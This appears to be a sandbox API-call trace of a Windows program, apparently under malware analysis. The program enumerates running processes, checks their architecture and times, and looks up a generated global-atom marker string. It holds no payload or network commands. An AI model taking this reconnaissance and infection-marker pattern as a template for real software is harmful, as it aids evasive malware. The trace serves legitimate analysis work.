	[0097.315] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.315] CloseHandle (hObject=0x248) returned 1
	[0097.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x6590a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0097.315] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0097.315] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.315] CloseHandle (hObject=0x248) returned 1
	[0097.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x65adb8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0097.316] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0097.316] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.316] CloseHandle (hObject=0x248) returned 1
	[0097.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x658dc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0097.316] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0097.316] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.316] CloseHandle (hObject=0x248) returned 1
	[0097.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x658c90, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0097.316] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0097.316] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.316] CloseHandle (hObject=0x248) returned 1
	[0097.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x6590a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0097.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0097.317] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.317] CloseHandle (hObject=0x248) returned 1
	[0097.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x64fe78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0097.317] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.317] CloseHandle (hObject=0x248) returned 1
	[0097.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0097.317] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.317] CloseHandle (hObject=0x248) returned 1
	[0097.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x658dc8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0097.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0097.317] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.318] CloseHandle (hObject=0x248) returned 1
	[0097.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x6590a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0097.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0097.318] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.318] CloseHandle (hObject=0x248) returned 1
	[0097.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x64fe90, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0097.318] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.318] CloseHandle (hObject=0x248) returned 1
	[0097.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x64fd10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0097.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0097.318] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.318] CloseHandle (hObject=0x248) returned 1
	[0097.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x658c68, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0097.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0097.319] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.319] CloseHandle (hObject=0x248) returned 1
	[0097.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0097.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0097.319] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.319] CloseHandle (hObject=0x248) returned 1
	[0097.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x64fe78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0097.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0097.319] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.319] CloseHandle (hObject=0x248) returned 1
	[0097.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x658ee8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0097.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0097.320] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.320] CloseHandle (hObject=0x248) returned 1
	[0097.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0097.320] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.320] CloseHandle (hObject=0x248) returned 1
	[0097.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x658d88, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0097.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0097.320] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.320] CloseHandle (hObject=0x248) returned 1
	[0097.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x658c68, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0097.321] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0097.321] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.321] CloseHandle (hObject=0x248) returned 1
	[0097.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x658c68, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0097.321] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0097.321] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.321] CloseHandle (hObject=0x248) returned 1
	[0097.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x64fe78, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0097.321] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0097.321] GetLastError () returned 0x5
	[0097.321] GetLastError () returned 0x5
	[0097.321] GetLastError () returned 0x5
	[0097.321] GetLastError () returned 0x5
	[0097.321] GetLastError () returned 0x5
	[0097.321] GetLastError () returned 0x5
	[0097.321] GetLastError () returned 0x5
	[0097.321] GetLastError () returned 0x5
	[0097.321] GetLastError () returned 0x5
	[0097.321] GetLastError () returned 0x5
	[0097.321] GetLastError () returned 0x5
	[0097.321] GetLastError () returned 0x5
	[0097.321] GetLastError () returned 0x5
	[0097.321] GetLastError () returned 0x5
	[0097.321] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetLastError () returned 0x5
	[0097.322] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0097.323] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0097.323] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0097.323] GetLastError () returned 0x5
	[0097.323] GetLastError () returned 0x5
	[0097.323] GetLastError () returned 0x5
	[0097.323] GetLastError () returned 0x5
	[0097.323] GetLastError () returned 0x5
	[0097.323] GetLastError () returned 0x5
	[0097.323] GetLastError () returned 0x5
	[0097.323] GetLastError () returned 0x5
	[0097.323] GetLastError () returned 0x5
	[0097.323] GetLastError () returned 0x5
	[0097.323] GetLastError () returned 0x5
	[0097.323] GetLastError () returned 0x5
	[0097.323] GetLastError () returned 0x5
	[0097.323] GetLastError () returned 0x5
	[0097.323] GetLastError () returned 0x5
	[0097.323] GetLastError () returned 0x5
	[0097.323] GetLastError () returned 0x5
	[0097.323] GetLastError () returned 0x5
	[0097.323] GetLastError () returned 0x5
	[0097.323] GetLastError () returned 0x5
	[0097.323] GetLastError () returned 0x5
	[0097.323] GetLastError () returned 0x5
	[0097.323] GetLastError () returned 0x5
	[0097.323] GetLastError () returned 0x5
	[0097.323] GetLastError () returned 0x5
	[0097.323] GetLastError () returned 0x5
	[0097.323] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0097.323] GetLastError () returned 0x5
	[0097.324] GetLastError () returned 0x5
	[0097.324] GetLastError () returned 0x5
	[0097.324] GetLastError () returned 0x5
	[0097.324] GetLastError () returned 0x5
	[0097.324] GetLastError () returned 0x5
	[0097.324] GetLastError () returned 0x5
	[0097.324] GetLastError () returned 0x5
	[0097.324] GetLastError () returned 0x5
	[0097.324] GetLastError () returned 0x5
	[0097.324] GetLastError () returned 0x5
	[0097.324] GetLastError () returned 0x5
	[0097.324] GetLastError () returned 0x5
	[0097.324] GetLastError () returned 0x5
	[0097.324] GetLastError () returned 0x5
	[0097.324] GetLastError () returned 0x5
	[0097.324] GetLastError () returned 0x5
	[0097.324] GetLastError () returned 0x5
	[0097.324] GetLastError () returned 0x5
	[0097.324] GetLastError () returned 0x5
	[0097.324] GetLastError () returned 0x5
	[0097.324] GetLastError () returned 0x5
	[0097.324] GetLastError () returned 0x5
	[0097.324] GetLastError () returned 0x5
	[0097.324] GetLastError () returned 0x5
	[0097.324] GetLastError () returned 0x5
	[0097.324] GetLastError () returned 0x5
	[0097.324] GetLastError () returned 0x5
	[0097.324] GetLastError () returned 0x5
	[0097.324] GetLastError () returned 0x5
	[0097.324] GetLastError () returned 0x5
	[0097.324] GetLastError () returned 0x5
	[0097.324] GetLastError () returned 0x5
	[0097.324] GetLastError () returned 0x5
	[0097.324] GetLastError () returned 0x5
	[0097.324] GetLastError () returned 0x5
	[0097.324] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetLastError () returned 0x5
	[0097.325] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0097.325] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0097.326] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0097.326] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0097.326] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0097.326] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0097.326] CloseHandle (hObject=0x248) returned 1
	[0097.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0097.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0097.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x64fe78, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0097.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0097.326] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.327] CloseHandle (hObject=0x248) returned 1
	[0097.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x65ada8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0097.327] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0097.327] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.327] CloseHandle (hObject=0x248) returned 1
	[0097.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x64fd10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0097.562] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16728) returned 0xc0000004
	[0097.562] VirtualAlloc (lpAddress=0x0, dwSize=0x16828, flAllocationType=0x3000, flProtect=0x4) returned 0x610000
	[0097.562] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x610000, Length=0x16828, ResultLength=0x0 | out: SystemInformation=0x610000, ResultLength=0x0) returned 0x0
	[0097.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0097.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x64fd28, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0097.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0097.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fd10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0097.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0097.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.565] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0097.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fd10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0097.565] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0097.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x64fe78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.565] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0097.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x64fe78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.565] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0097.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x64fe78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0097.566] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0097.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.566] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0097.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd28, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.566] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0097.567] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x65acc8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0097.567] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0097.567] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.567] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0097.567] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.568] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0097.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.568] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0097.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.568] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0097.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.568] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0097.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
